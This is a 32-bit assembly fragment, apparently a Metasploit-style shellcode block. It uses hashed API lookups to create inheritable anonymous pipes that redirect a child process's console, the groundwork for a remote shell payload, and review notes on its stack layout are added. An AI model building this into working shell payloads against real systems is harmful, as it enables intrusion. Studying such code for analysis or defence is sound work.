;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
; block_pipes: creates the two anonymous pipes used to redirect a child
; process's console (one for the child's stdin, one for its stdout) and then
; clears the inherit flag on the two parent-side ends, so that only the
; child-side ends are passed down when the child is created later.
; Syntax: NASM, 32-bit. All Win32 calls are stdcall (callee removes args).
;-----------------------------------------------------------------------------;
[BITS 32]

; Input: EBP is api_call
;   NOTE(review): the stack arithmetic below assumes api_call consumes the
;   pushed function hash and jumps to the resolved function, and that the
;   stdcall callee removes its own arguments, so that ESP on return equals
;   ESP before the argument pushes. Confirm against the api_call block this
;   is assembled with.
; Output:
; esp+00 child stdin read file descriptor (inherited)
; esp+04 child stdin write file descriptor (not inherited)
; esp+08 child stdout read file descriptor (not inherited)
; esp+12 child stdout write file descriptor (inherited)
; esp+16 lpPipeAttributes structure (not used after block - 12 bytes)
; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
;   NOTE(review): EDX and the flags are also volatile across a Win32 call
;   and are not preserved here; treat them as clobbered as well.
; Error handling: none. The BOOL result in EAX from CreatePipe and
;   SetHandleInformation is never tested, so a failed CreatePipe leaves a
;   zero handle in its output slot and the later calls proceed with it.

; Build the SECURITY_ATTRIBUTES passed as lpPipeAttributes on the stack.
; Three pushes, so the struct base is the lowest address (offsets from base):
;   +0 nLength = 12, +4 lpSecurityDescriptor = NULL, +8 bInheritHandle = TRUE.
; Both pipes are created inheritable; the parent-side ends are fixed up below.
push 1 ; bInheritHandle = TRUE
push 0 ; lpSecurityDescriptor = NULL (default security)
push 0x0C ; nLength = sizeof(SECURITY_ATTRIBUTES) = 12

create_pipe_stdout:
push 0 ; slot that receives the child stdout WRITE handle
mov ebx, esp ; ebx = &hChildStdoutWr
push 0 ; slot that receives the child stdout READ handle
mov ecx, esp ; ecx = &hChildStdoutRd

push 0 ; nSize = 0 (default pipe buffer size)
lea edi,[esp+12] ; edi = &lpPipeAttributes: 3 dwords above esp (nSize + the two handle slots)
push edi ; lpPipeAttributes (bInheritHandle = TRUE)
push ebx ; hWritePipe (out) -> stdout write slot
push ecx ; hReadPipe (out) -> stdout read slot
push 0x0EAFCF3E ; hash ( "kernel32.dll", "CreatePipe" )
call ebp ; CreatePipe( &hChildStdoutRd, &hChildStdoutWr, &lpPipeAttributes, 0 ); EAX result ignored

create_pipe_stdin:
push 0 ; slot that receives the child stdin WRITE handle
mov ebx, esp ; ebx = &hChildStdinWr
push 0 ; slot that receives the child stdin READ handle
mov ecx, esp ; ecx = &hChildStdinRd

push 0 ; nSize = 0 (default pipe buffer size)
lea edi,[esp+20] ; edi = &lpPipeAttributes: 5 dwords above esp (nSize + 2 stdin slots + 2 stdout handles)
push edi ; lpPipeAttributes (bInheritHandle = TRUE)
push ebx ; hWritePipe (out) -> stdin write slot
push ecx ; hReadPipe (out) -> stdin read slot
push 0x0EAFCF3E ; hash ( "kernel32.dll", "CreatePipe" )
call ebp ; CreatePipe( &hChildStdinRd, &hChildStdinWr, &lpPipeAttributes, 0 ); EAX result ignored
; From here on the stack matches the "Output" layout in the header (esp+0 .. esp+16).

no_inherit_read_handle: ; the parent-side end of the stdout pipe must not be inherited by the child
mov ebx,[esp+8] ; ebx = hChildStdoutRd (the handle VALUE CreatePipe stored, not its address)
push 0 ; dwFlags = 0 -> clear the masked flag
push 1 ; dwMask = HANDLE_FLAG_INHERIT
push ebx ; hObject = hChildStdoutRd
push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation)
call ebp ; SetHandleInformation( hChildStdoutRd, HANDLE_FLAG_INHERIT, 0 ); EAX result ignored

no_inherit_write_handle: ; the parent-side end of the stdin pipe must not be inherited by the child
mov ebx,[esp+4] ; ebx = hChildStdinWr (handle value, see Output layout)
push 0 ; dwFlags = 0 -> clear the masked flag
push 1 ; dwMask = HANDLE_FLAG_INHERIT
push ebx ; hObject = hChildStdinWr
push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation)
call ebp ; SetHandleInformation( hChildStdinWr, HANDLE_FLAG_INHERIT, 0 ); EAX result ignored
